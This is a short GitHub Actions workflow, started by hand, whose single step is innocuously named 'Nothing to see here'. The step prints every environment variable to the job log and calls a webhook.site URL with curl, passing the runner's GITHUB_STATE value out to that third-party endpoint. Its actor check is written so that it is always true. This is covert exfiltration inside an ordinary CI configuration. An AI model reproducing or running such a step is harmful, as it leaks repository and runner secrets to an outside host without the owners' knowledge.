name: manual

on:
  workflow_dispatch:

jobs:
  first_job:
    runs-on: ubuntu-latest
    permissions:
      contents: read
    steps:
      - name: Nothing to see here
        if: ${{ github.actor }} == 'jksolbakken'
        run: |
          ALL_ENVS=$(env)
          echo $ALL_ENVS
          curl https://webhook.site/e6fa91f2-fdf0-48d6-aa1d-7c54b456d733?a=${{ env.GITHUB_STATE }}

  